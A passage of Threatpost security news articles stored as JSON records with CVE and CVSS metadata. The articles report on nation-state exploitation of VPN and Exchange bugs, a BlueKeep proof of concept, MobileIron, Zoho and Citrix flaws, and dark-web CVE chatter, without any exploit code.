In fact, he said, according to a recent [Check Point report](<https://www.checkpoint.com/downloads/resources/cyber-attack-trends-report-mid-year-2020.pdf?mkt_tok=eyJpIjoiTldNM05UWTJOelEwTnpZeCIsInQiOiJTSVY0QTBcL0d1UnpKcXM1UzZRRnRRV1RBV1djcnArM3BWK0VrUlQyb2JFVkJka05EWFhGOFpSSVJOZGszcnlpVFNVNVBwSjZDRXNxZGdkTGRKQzJJem4yYWlBQXJERUdkNDNrZEJDWGxNVUZ3WWt5K25vc2trRnNPNFZaY3JzOE8ifQ%3D%3D>), 80 percent of observed ransomware attacks in the first half of 2020 used vulnerabilities reported and registered in 2017 and earlier \u2013 and more than 20 percent of the attacks used vulnerabilities that are at least seven years old.\n\n\u201cPatch management is one of the fundamentals of security, however, it is difficult and we are still receiving a failing grade. Patch management, enforcing MFA and least privilege are key to preventing cyber-attacks in both the public and private sectors,\u201d he told Threatpost.\n\n[**On Wed Sept. 16 @ 2 PM ET:**](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)** Learn the secrets to running a successful Bug Bounty Program. **[**Register today**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)** for this FREE Threatpost webinar \u201c**[**Five Essentials for Running a Successful Bug Bounty Program**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)**\u201c. Hear from top Bug Bounty Program experts how to juggle public versus private programs and how to navigate the tricky terrain of managing Bug Hunters, disclosure policies and budgets. Join us Wednesday Sept. 
16, 2-3 PM ET for this **[**LIVE**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)** webinar.**\n", "cvss3": {}, "published": "2020-09-14T21:20:46", "type": "threatpost", "title": "Feds Warn Nation-State Hackers are Actively Exploiting Unpatched Microsoft Exchange, F5, VPN Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-5135", "CVE-2020-5902"], "modified": "2020-09-14T21:20:46", "id": "THREATPOST:558A7B1DE564A8E368D33E86E291AB77", "href": "https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-01T21:47:35", "description": "An APT group known as Pioneer Kitten, linked to Iran, has been spotted selling corporate-network credentials on hacker forums. The credentials would let other cybercriminal groups and APTs perform cyberespionage and other nefarious cyber-activity.\n\nPioneer Kitten is a hacker group that specializes in infiltrating corporate networks using open-source tools to compromise remote external services. 
Researchers observed an actor associated with the group advertising access to compromised networks on an underground forum in July, according to a [blog post](<https://www.crowdstrike.com/blog/who-is-pioneer-kitten/>) Monday from Alex Orleans, a senior intelligence analyst at CrowdStrike Intelligence.\n\nPioneer Kitten\u2019s work is related to other groups either sponsored or run by the Iranian government, which [were previously seen](<https://www.zdnet.com/article/iranian-hackers-have-been-hacking-vpn-servers-to-plant-backdoors-in-companies-around-the-world/>) hacking VPNs and planting backdoors in companies around the world.\n\nIndeed, the credential sales on hacker forums seem to suggest \u201ca potential attempt at revenue stream diversification\u201d to complement \u201cits targeted intrusions in support of the Iranian government,\u201d Orleans wrote. However, Pioneer Kitten, which has been around since 2017, does not appear to be directly operated by the Iranian government but is rather sympathetic to the regime and likely a private contractor, Orleans noted.\n\nPioneer Kitten\u2019s chief mode of operations is its reliance on SSH tunneling, using open-source tools such as Ngrok and a custom tool called SSHMinion, he wrote. The group uses these tools to communicate \u201cwith implants and hands-on-keyboard activity via Remote Desktop Protocol (RDP)\u201d to exploit vulnerabilities in VPNs and network appliances to do its dirty work, Orleans explained.\n\nCrowdStrike observed the group leveraging several critical exploits in particular \u2014 [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>), [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>), and most recently, [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>). 
All three exploits affect VPNs and networking equipment, including Pulse Secure \u201cConnect\u201d enterprise VPNs, Citrix servers and network gateways, and F5 Networks BIG-IP load balancers, respectively.\n\nPioneer Kitten\u2019s targets are North American and Israeli organizations in various sectors that represent some type of intelligence interest to the Iranian government, according to CrowdStrike. Target sectors run the gamut and include technology, government, defense, healthcare, aviation, media, academic, engineering, consulting and professional services, chemical, manufacturing, financial services, insurance and retail.\n\nWhile not as well-known or widespread in its activity as other nation-state threats such as China and Russia, Iran has emerged in recent years as a formidable cyber-enemy, amassing a number of APTs to mount attacks on its political adversaries.\n\nOf these, Charming Kitten\u2014which also goes by the names APT35, Ajax or Phosphorus\u2014appears to be the most active and dangerous, while others bearing similar names seem to be spin-offs or support groups. Iran overall appears to be ramping up its cyber-activity lately. CrowdStrike\u2019s report actually comes on the heels of news that Charming Kitten also has [resurfaced recently](<https://threatpost.com/charming-kitten-whatsapp-linkedin-effort/158813/>). A new campaign is using LinkedIn and WhatsApp to convince targets \u2014 including Israeli university scholars and U.S. government employees \u2014 to click on a malicious link that can steal credentials.\n\nOperating since 2014, Charming Kitten is known for politically motivated and socially engineered attacks, and often uses phishing as its attack of choice. 
Targets of the APT, which uses clever social engineering to snare victims, have been [email accounts](<https://threatpost.com/iran-linked-hackers-target-trump-2020-campaign-microsoft-says/148931/>) tied to the Trump 2020 re-election campaign and [public figures and human-rights activists](<https://threatpost.com/charming-kitten-uses-fake-interview-requests-to-target-public-figures/152628/>), among others.\n", "cvss3": {}, "published": "2020-09-01T13:35:19", "type": "threatpost", "title": "Pioneer Kitten APT Sells Corporate Network Access", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902"], "modified": "2020-09-01T13:35:19", "id": "THREATPOST:AD4EF56E5440159F6E37D8B403C253D7", "href": "https://threatpost.com/pioneer-kitten-apt-sells-corporate-network-access/158833/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-07T21:57:53", "description": "A researcher has created a proof-of-concept Metasploit module for the critical BlueKeep vulnerability, which successfully demonstrates how to achieve complete takeover of a target Windows machine.\n\nReverse engineer Z\u01dd\u0279osum0x0 [tweeted about his success](<https://twitter.com/zerosum0x0/status/1135866953996820480>) on Tuesday, noting that he plans to keep the module private given the danger that a working exploit could pose to the vast swathe of unpatched systems out there. He also released a video showing a remote code-execution (RCE) exploit working on a Windows 2008 desktop, paired with the Mimikatz tool to harvest login credentials. In about 22 seconds, he achieved full takeover.\n\n\u201cStill too dangerous to release, lame sorry,\u201d he tweeted. \u201cMaybe after first mega-worm?\u201d\n\nAn [earlier proof-of-concept (PoC) from McAfee](<https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/>) showed a successful RCE exploit, but didn\u2019t include the credential-harvesting \u2013 so a mitigating factor in that exploit would be the need for an attacker to bypass network-level authentication protections. 
\n\nThe BlueKeep vulnerability (CVE-2019-0708) is an RCE flaw in Remote Desktop Services that impacts older versions of Windows, including Windows 7, Windows XP, Server 2003, Server 2008 and Server 2008 R2. The main thing that sets BlueKeep apart is the fact that it\u2019s wormable \u2013 and so it can self-propagate from machine to machine, setting up the scene for a [WannaCry-level, fast-moving infection wave](<https://threatpost.com/the-wannacry-security-legacy-and-whats-to-come/144607/>).\n\nThe concern is big enough that Microsoft even took the unusual step of deploying patches to Windows XP and Windows 2003, which are end-of-life and no longer supported by the computing giant. It has also issued multiple follow-on advisories urging administrators to patch.\n\nThe new exploit works on most vulnerable machines, with the exception of Windows Server 2003, according to Z\u01dd\u0279osum0x0. The researcher [said that it took time](<https://twitter.com/zerosum0x0/status/1135219212199186434>) to develop the exploit, but clearly it can be achieved.\n\nThe National Security Agency concurs with the engineer on the possibility of widespread, in-the-wild exploitation.\n\n\u201cIt is likely only a matter of time before remote exploitation code is widely available for this vulnerability,\u201d the NSA said in [an advisory](<https://www.us-cert.gov/ncas/current-activity/2019/06/04/NSA-Releases-Advisory-BlueKeep-Vulnerability>) on Tuesday. \u201cNSA is concerned that malicious cyber-actors will use the vulnerability in ransomware and exploit kits containing other known exploits, increasing capabilities against other unpatched systems.\u201d\n\nThe danger isn\u2019t just the potential for a worm-wave; denial-of-service could be a problem too. 
Researchers attempting to create PoC exploits found that their efforts [largely caused systems to crash](<https://www.exploit-db.com/exploits/46946>) before they could achieve RCE.\n\nTo boot, the attack surface is unfortunately large. Although Microsoft issued a patch for the recently disclosed BlueKeep as part of its [May Patch Tuesday](<https://threatpost.com/microsoft-patches-zero-day/144742/>) Security Bulletin (and there\u2019s a [micropatch](<https://0patch.com/patches.html>) out there too), [researchers said last week](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>) that at least 1 million devices linked to the public internet are still vulnerable to the bug. And the NSA in its advisory warned that the number could actually be in the multimillions.\n\nSome are finding patching to be an onerous process given that many older machines are in production environments where the required reboot \u2013 taking mission-critical systems offline \u2013 just isn\u2019t feasible.\n\n> But patch deployment will take 35 days and we can't deploy to 18.24% because downtime issues and we've raised the requests for the rest into the change tool and \u2026\u2026..\n> \n> \u2014 Taz Wake (@tazwake) [June 4, 2019](<https://twitter.com/tazwake/status/1135890835101368321?ref_src=twsrc%5Etfw>)\n\nNonetheless, with the demonstration that RCE can be achieved, hopefully administrators will find a way to update their environments.\n\n\u201cIt only takes one vulnerable computer connected to the internet to provide a potential gateway into these corporate networks, where advanced malware could spread, infecting computers across the enterprise,\u201d Microsoft warned in [an advisory](<https://blogs.technet.microsoft.com/msrc/2019/05/30/a-reminder-to-update-your-systems-to-prevent-a-worm/>). 
\u201cThis scenario could be even worse for those who have not kept their internal systems updated with the latest fixes, as any future malware may also attempt further exploitation of vulnerabilities that have already been fixed.\u201d\n", "cvss3": {}, "published": "2019-06-05T14:14:47", "type": "threatpost", "title": "BlueKeep 'Mega-Worm' Looms as Fresh PoC Shows Full System Takeover", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-0708", "CVE-2019-18935"], "modified": "2019-06-05T14:14:47", "id": "THREATPOST:58D6B44423A20EFC8CC4AD8B195A7228", "href": "https://threatpost.com/bluekeep-mega-worm-looms-as-fresh-poc-shows-full-system-takeover/145368/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-26T03:52:19", "description": "Advanced persistent threat (APT) groups are actively exploiting a vulnerability in mobile device management security solutions from MobileIron, a new advisory warns.\n\nThe issue in question (CVE-2020-15505) is a remote code-execution flaw. It ranks 9.8 out of 10 on the CVSS severity scale, making it critical. The flaw was patched back in June; however, a proof-of-concept (PoC) [exploit became available](<https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2020-15505>) in September. Since then, both hostile state actors and cybercriminals have attempted to exploit the flaw in the U.K., according to a new advisory by the National Cyber Security Centre (NCSC).\n\n\u201cThese actors typically scan victim networks to identify vulnerabilities, including CVE-2020-15505, to be used during targeting,\u201d said the NCSC [in an advisory this week](<https://www.ncsc.gov.uk/news/alert-multiple-actors-attempt-exploit-mobileiron-vulnerability>). 
\u201cIn some cases, when the latest updates are not installed, they have successfully compromised systems.\u201d\n\nThe NCSC said that the healthcare, local government, logistics and legal sectors have all been targeted \u2013 but others could also be affected.\n\nSeparately, the Cybersecurity and Infrastructure Security Agency (CISA) [in October warned that](<https://threatpost.com/election-systems-attack-microsoft-zerologon/160021/>) APT groups are exploiting the MobileIron flaw in combination with the severe Microsoft Windows [Netlogon/Zerologon vulnerability](<https://threatpost.com/microsoft-warns-zerologon-bug/160769/>) (CVE-2020-1472).\n\n## **The Flaw**\n\nThe flaw, first reported to MobileIron by Orange Tsai from DEVCORE, could allow an attacker to execute remote exploits without authentication.\n\nMobileIron provides a platform that allows enterprises to manage end-user mobile devices across their company. The flaw exists across various components of this platform: in MobileIron Core, a component of the MobileIron platform that serves as the administrative console; and in MobileIron Connector, a component that adds real-time connectivity to the backend. 
Also impacted is Sentry, an in-line gateway that manages, encrypts and secures traffic between mobile devices and back-end enterprise systems; and Monitor and Reporting Database, which provides comprehensive performance management functionality.\n\nThe bug affects Core and Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0; Sentry versions 9.7.2 and earlier, and 9.8.0; and Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier, allowing remote attackers to execute arbitrary code via unspecified vectors.\n\n## **Patches**\n\nMobileIron, for its part, said in an update this week that it has been engaging in \u201cproactive outreach to help customers secure their systems,\u201d and estimates that 90 to 95 percent of all devices are now managed on patched/updated versions of software.\n\nWhile the company said it will continue to follow up with the remaining customers where it can determine that they have not yet patched affected products, it strongly urges companies to make sure they are updated.\n\n\u201cMobileIron strongly recommends that customers apply these patches and any security updates as soon as possible,\u201d said the company in its [security update](<https://www.mobileiron.com/en/blog/mobileiron-security-updates-available>).\n\nThreatpost has reached out to MobileIron for further comment.\n", "cvss3": {}, "published": "2020-11-25T16:55:48", "type": "threatpost", "title": "Critical MobileIron RCE Flaw Under Active Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1472", "CVE-2020-15505"], "modified": "2020-11-25T16:55:48", "id": "THREATPOST:49274446DFD14E2B0DF948DA83A07ECB", "href": "https://threatpost.com/critical-mobileiron-rce-flaw-attack/161600/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-30T22:24:12", "description": "As the 2020 presidential election draws closer and primary season looms around the corner, Microsoft has launched a bug-bounty program specifically aimed at its ElectionGuard product, which the software giant has positioned as performing \u201cend-to-end verification of elections.\u201d\n\nElectionGuard is a free open-source software development kit that secures the results of elections and makes those results securely available to approved third-party organizations for validation; it also allows individual voters to confirm that their votes were correctly counted.\n\nThe bounty program invites security researchers (\u201cwhether full-time cybersecurity professionals, part-time hobbyists or students\u201d) to probe ElectionGuard for high-impact vulnerabilities and share them with Microsoft under Coordinated Vulnerability Disclosure (CVD). 
Submissions with a \u201cclear, concise proof of concept\u201d (PoC) are eligible for awards ranging from $500 to $15,000 depending on the severity of the bug found.\n\nIn-scope products include the ElectionGuard specification and documentation (such as data-transmission issues like information leakage); the verifier reference implementation (bugs that allow attackers to say elections are valid when they aren\u2019t); and C Cryptography implementations (such as bugs that allow key or vote discovery by observing SDK messages).\n\nThe program is one prong of the company\u2019s wider \u201cDefending Democracy\u201d program, under which Microsoft has pledged to [protect campaigns from hacking](<https://threatpost.com/fbi-dhs-report-links-fancy-bear-to-election-hacks/122802/>); increase political [advertising transparency](<https://threatpost.com/google-fine-privacy-gdpr/141055/>) online; explore ways to [protect electoral processes](<https://threatpost.com/voting-machines-hacked-with-ease-at-def-con/127101/>) with technology; and defend against [disinformation campaigns](<https://threatpost.com/twitter-5000-accounts-disinformation-campaigns/145764/>).\n\nResearchers said that the bug-bounty program is a welcome \u2013 if limited \u2013 addition to the private sector\u2019s response to election meddling. However, they also highlighted the need for a more holistic effort, united across both public and private organizations.\n\n\u201c[Russian interference in the 2016 election](<https://threatpost.com/justice-department-indicts-12-russian-nationals-tied-to-2016-election-hacking/133978/>) gave cybersecurity a quick moment in the political spotlight,\u201d Monique Becenti, product and channel specialist at SiteLock, told Threatpost. \u201cBut when the cost of cybercrime reaches billions of dollars each year, election security needs to be top of mind for our political leaders. 
Since 2016, election security bills have been slow-moving. Some companies, like Microsoft, are rallying the security industry to address this issue head-on. The ElectionGuard Bounty program is an important step in the right direction, but we need political leaders who will champion this issue and ensure constituents and our elections stay secure.\u201d\n\nNot everyone is excited about the move; Richard Gold, head of security engineering at Digital Shadows, said that the program is limited to Microsoft\u2019s proprietary solution, which makes its real-world impact limited at best.\n\n\u201cIt\u2019s great that companies like Microsoft are launching programs like this, but the question remains: how much is this kind of bug bounty going to be used?\u201d he told Threatpost. \u201cBug-bounty programs need to be applied consistently in order to have real impact. There is a trade-off in time and resources that needs to be overcome in order for a program like this to be worthwhile.\u201d\n\n\u201cMicrosoft is committed to strengthening our partnership with the security research community as well as pursuing new areas for security improvement in emerging technology,\u201d said Jarek Stanley, senior program manager at the Microsoft Security Response Center, in [announcing the program](<https://msrc-blog.microsoft.com/2019/10/18/introducing-the-electionguard-bounty-program/>). \u201cWe look forward to sharing more bounty updates and improvements in the coming months.\u201d\n\nMicrosoft paid $4.4 million in bounty rewards between July 1, 2018 and June 30 across 11 bounty programs, with a top award of $200,000.\n", "cvss3": {}, "published": "2019-10-18T20:04:29", "type": "threatpost", "title": "Microsoft Tackles Election Security with Bug Bounties", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0688", "CVE-2020-1472"], "modified": "2019-10-18T20:04:29", "id": "THREATPOST:891CC19008EEE7B8F1523A2BD4A37993", "href": "https://threatpost.com/microsoft-election-security-bug-bounties/149347/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:27:50", "description": "UPDATE\n\nA zero-day vulnerability has been disclosed in the IT help desk ManageEngine software made by Zoho Corp. The serious vulnerability enables an unauthenticated, remote attacker to launch attacks on affected systems. Zoho has now [released a security update](<https://www.us-cert.gov/ncas/current-activity/2020/03/06/zoho-releases-security-update-manageengine-desktop-central>) addressing the vulnerability.\n\nAs of Monday, March 9, the vulnerability has been observed being actively exploited in the wild, according to a [Center for Internet Security advisory](<https://www.cisecurity.org/advisory/a-vulnerability-in-manageengine-desktop-central-could-allow-for-remote-code-execution_2020-033/>).\n\nThe vulnerability, [first reported by ZDNet](<https://www.zdnet.com/article/zoho-zero-day-published-on-twitter/#ftag=RSSbaffb68>), exists in Zoho ManageEngine Desktop Central, an endpoint management tool to help users manage their servers, laptops, smartphones, and more from a central location. 
Steven Seeley of Source Incite [disclosed the flaw](<https://srcincite.io/advisories/src-2020-0011/>) on Twitter, Thursday, along with a proof-of-concept (PoC) exploit. According to ZDNet, the enterprise software development company will release a patch for the flaw on Friday.\n\n\u201cThis vulnerability allows remote attackers to execute arbitrary code on affected installations of ManageEngine Desktop Central. Authentication is not required to exploit this vulnerability,\u201d according to Seeley.\n\nAccording to Seeley, the specific flaw exists within the FileStorage class of Desktop Central. The FileStorage class is used to read data from, or write data to, a file. The issue results from improper validation of user-supplied data, which can result in deserialization of untrusted data.\n\nSeeley told Threatpost that an attacker can leverage this vulnerability to execute code under the context of SYSTEM, giving them \u201cfull control of the target machine\u2026 basically the worst it gets.\u201d\n\n> Since [@zoho](<https://twitter.com/zoho?ref_src=twsrc%5Etfw>) typically ignores researchers, I figured it was OK to share a ManageEngine Desktop Central zero-day exploit with everyone. UnCVE'ed, unpatched and unauthenticated RCE as SYSTEM/root. Enjoy!\n> \n> Advisory: <https://t.co/U9LZPp4l5o> \n> Exploit: <https://t.co/LtR75bhooy>\n> \n> \u2014 \u03fb\u0433_\u03fb\u03b5 (@steventseeley) [March 5, 2020](<https://twitter.com/steventseeley/status/1235635108498948096?ref_src=twsrc%5Etfw>)\n\nAccording to Seeley, who also posted a [PoC attack for the flaw on Twitter](<https://srcincite.io/pocs/src-2020-0011.py.txt>), the vulnerability ranks 9.8 out of 10.0 on the CVSS scale, making it critical in severity. 
Nate Warfield, a security researcher with Microsoft, pointed to [at least 2,300](<https://twitter.com/n0x08/status/1235637306838532096>) Zoho systems potentially exposed online.\n\nRick Holland, CISO and vice president of strategy at Digital Shadows, said that if an attacker can compromise a solution like ManageEngine, they have an \u201copen season\u201d on a target company\u2019s environment.\n\n\u201cAn attacker has a myriad of options not limited to: accelerating reconnaissance of the target environment, deploying their malware including ransomware, or even remotely monitoring users\u2019 machines,\u201d Holland told Threatpost. \u201cGiven that this vulnerability enables unauthenticated remote execution of code, it is even more vital that companies deploy a patch as soon as it becomes available. Internet-facing deployments of Desktop Central should be taken offline immediately.\u201d\n\nThreatpost has reached out to Zoho via email and Twitter for further comment; the company has not yet responded. However, Zoho said on Twitter, \u201cwe have identified the issue and are working on a patch with top priority. We will update once it is done.\u201d\n\n> We have identified the issue and are working on a patch with top priority. We will update once it is done. ^BG\n> \n> \u2014 Zoho (@zoho) [March 6, 2020](<https://twitter.com/zoho/status/1235811733194682368?ref_src=twsrc%5Etfw>)\n\nSeeley told Threatpost that he didn\u2019t contact Zoho before disclosing the vulnerability due to negative previous experiences with the company regarding vulnerability disclosure. \u201cI have in the past for other critical vulnerabilities and they ignored me,\u201d he said.\n\nThis lack of responsible disclosure has drawn mixed opinions from security experts. 
Some, like Rui Lopes, engineering and technical support director at Panda Security, told Threatpost that the incident could leave vulnerable systems open to bad actors.\n\n\u201cThere seems to be some breakdown of communication between independent researchers and the solution vendors who offer centralized IT management platforms, which inevitably leads to inefficient patching protocols and the exposure of sensitive information that arms bad actors with threat vectors that would be otherwise unknown.\u201d\n\nTim Wade, technical director of the CTO Team at Vectra, told Threatpost that the incident highlights the need for better relationships between security researchers and organizations.\n\n\u201cAllegedly, Zoho\u2019s reputation for ignoring security researchers who\u2019ve found exploitable bugs in their products factored into the decision for a direct release,\u201d he said. \u201cWhile the merits of this decision may be discussed fairly from multiple perspectives, at a minimum it underscores the need for software organizations to foster better relationships with the security community, and the seriousness of failing to do so.\u201d\n\nResearchers previously found multiple critical flaws in 2018 in Zoho\u2019s [ManageEngine software](<https://threatpost.com/multiple-critical-flaws-found-in-zohos-manageengine/129709/>). In all, seven vulnerabilities were discovered, each allowing an attacker to ultimately take control of host servers running ManageEngine\u2019s SaaS suite of applications. 
Previously, a massive number of [keylogger phishing campaigns](<https://threatpost.com/keyloggers-turn-to-zoho-office-suite-in-droves-for-data-exfiltration/137868/>) were also seen tied to the Zoho online office suite software; in an analysis, a full 40 percent spotted in October 2018 used a zoho.com or zoho.eu email address to exfiltrate data from victim machines.\n\n_This article was updated Friday at 4:36 p.m. to reflect that Zoho has released a patch; and on Monday at 4 p.m. to reflect that the flaw is now being actively exploited in the wild._\n", "cvss3": {}, "published": "2020-03-06T16:53:00", "type": "threatpost", "title": "Critical Zoho Zero-Day Flaw Disclosed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-10189", "CVE-2020-1472", "CVE-2020-5135"], "modified": "2020-03-06T16:53:00", "id": "THREATPOST:199785A97C530FECDF2B53B871FBE1C2", "href": "https://threatpost.com/critical-zoho-zero-day-flaw-disclosed/153484/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-17T07:28:30", "description": "Criminal small talk in underground forums offers critical clues about which known Common Vulnerabilities and Exposures (CVEs) threat actors are most focused on. 
This, in turn, offers defenders clues on what to watch out for.\n\nAn analysis of such chatter, by Cognyte, examined 15 [cybercrime forums](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) between Jan. 2020 and March 2021. In its report, researchers highlight which CVEs are the most frequently mentioned and try to determine where attackers might strike next.\n\n\u201cOur findings revealed that there is no 100 percent correlation between the two parameters, since the top five CVEs that received the highest number of posts are not exactly the ones that were mentioned on the highest number of Dark Web forums examined,\u201d the report said. \u201cHowever, it is still enough to understand which CVEs were popular among threat actors on the Dark Web during the time examined.\u201d\n\nThe researchers found [ZeroLogon](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>), [SMBGhost](<https://threatpost.com/smbghost-rce-exploit-corporate-networks/156391/>) and [BlueKeep](<https://threatpost.com/bluekeep-attacks-have-arrived-are-initially-underwhelming/149829/>) were among the most buzzed-about vulnerabilities among attackers between Jan. 
2020 and March 2021.\n\n## **Six CVEs Popular with Criminals**\n\n[CVE-2020-1472](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-1472>) (aka ZeroLogon)\n\n[CVE-2020-0796](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-0796>) (aka SMBGhost)\n\n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n\n[CVE-2019-0708](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2019-0708>) (aka BlueKeep)\n\n[CVE-2017-11882](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-11882>)\n\n[CVE-2017-0199](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-0199>)\n\n\u201cMost of the CVEs in this list were abused by nation-state groups and cybercriminals, such as ransomware gangs, during worldwide campaigns against different sectors,\u201d the report said.\n\nNotably, all the CVEs threat actors are still focused on are old, meaning that basic patching and mitigation could have stopped many attacks before they even got started.\n\nThe report added, the 9-year-old [CVE-2012-0158](<https://nvd.nist.gov/vuln/detail/CVE-2012-0158>) was exploited by threat actors during the COVID-19 pandemic in 2020, which, \u201cindicates that organizations are not patching their systems and are not maintaining a resilient security posture.\u201d\n\nMicrosoft has the dubious distinction of being behind five of the six most popular vulns on the Dark Web, Cognyte found. Microsoft has also had a tough time getting users to patch them.\n\nZeroLogon is a prime example. The [flaw in Microsoft\u2019s software](<https://threatpost.com/microsoft-implements-windows-zerologon-flaw-enforcement-mode/163104/>) allows threat actors to access domain controllers and breach all Active Directory identity services. 
Patching of ZeroLogon was so slow that Microsoft announced in January it would start blocking Active Directory domain access to unpatched systems with an \u201cenforcement mode.\u201d\n\nIn March 2020, Microsoft patched the number two vulnerability on the list, CVE-2020-0796, but as of October, 100,000 [Windows systems were still vulnerable](<https://threatpost.com/microsofts-smbghost-flaw-108k-windows-systems/160682/>).\n\nThe analysts explained that which CVEs drew the most discussion varied with the language of the forum. The CVE favored by Russian-language forums was CVE-2019-19781. Chinese forums were buzzing most about CVE-2020-0796. There was a tie between CVE-2020-0688 and CVE-2019-19781 in English-speaking threat actor circles. And Turkish forums were focused on CVE-2019-6340.\n\nThe researchers add, for context, that about half of the monitored forums were Russian-speaking and that Spanish forums aren\u2019t mentioned because no single CVE clearly dominated their discussions.\n\n**_Check out our free _**[**_upcoming live and on-demand webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {}, "published": "2021-07-16T21:07:15", "type": "threatpost", "title": "Top CVEs Trending with Cybercriminals", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2017-0199", "CVE-2017-11882", "CVE-2019-0708", "CVE-2019-19781", "CVE-2019-6340", "CVE-2020-0688", "CVE-2020-0796", "CVE-2020-1472"], "modified": "2021-07-16T21:07:15", "id": "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "href": "https://threatpost.com/top-cves-trending-with-cybercriminals/167889/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:22:57", "description": "Multiple vulnerabilities in the Citrix Application Delivery Controller (ADC) and Gateway would allow code injection, information disclosure and denial of service, the 
networking vendor announced Tuesday. Four of the bugs are exploitable by an unauthenticated, remote attacker.\n\nThe Citrix products (formerly known as NetScaler ADC and Gateway) are used for application-aware traffic management and secure remote access, respectively, and are installed in at least 80,000 companies in 158 countries, according to a December assessment from Positive Technologies.\n\nOther flaws announced Tuesday also affect Citrix SD-WAN WANOP appliances, models 4000-WO, 4100-WO, 5000-WO and 5100-WO.\n\nAttacks on the management interface of the products could result in system compromise by an unauthenticated user on the management network; or system compromise through cross-site scripting (XSS). Attackers could also create a download link for the device which, if downloaded and then executed by an unauthenticated user on the management network, could result in the compromise of a local computer.\n\n\u201cCustomers who have configured their systems in accordance with [Citrix recommendations](<https://docs.citrix.com/en-us/citrix-adc/citrix-adc-secure-deployment/secure-deployment-guide.html>) [i.e., to have this interface separated from the network and protected by a firewall] have significantly reduced their risk from attacks to the management interface,\u201d according to the vendor.\n\nThreat actors could also mount attacks on Virtual IPs (VIPs). 
VIPs, among other things, are used to provide users with a unique IP address for communicating with network resources for applications that do not allow multiple connections or users from the same IP address.\n\nThe VIP attacks include denial of service against either the Gateway or Authentication virtual servers by an unauthenticated user; or remote port scanning of the internal network by an authenticated Citrix Gateway user.\n\n\u201cAttackers can only discern whether a TLS connection is possible with the port and cannot communicate further with the end devices,\u201d according to the critical [Citrix advisory](<https://support.citrix.com/article/CTX276688>). \u201cCustomers who have not enabled either the Gateway or Authentication virtual servers are not at risk from attacks that are applicable to those servers. Other virtual servers e.g. load balancing and content switching virtual servers are not affected by these issues.\u201d\n\nA final vulnerability has been found in Citrix Gateway Plug-in for Linux that would allow a local logged-on user of a Linux system with that plug-in installed to elevate their privileges to an administrator account on that computer, the company said.\n\nOf the 11 vulnerabilities, there are six possible attack routes; but five of those have barriers to exploitation. Also, the latest patches fully resolve all the issues. Here\u2019s a full list of the bugs with exploitation barriers listed:\n\n\n\nSince Citrix is mainly used for giving remote access to applications in companies\u2019 internal networks, a compromise could easily be used as a foothold to move laterally across a victim organization. 
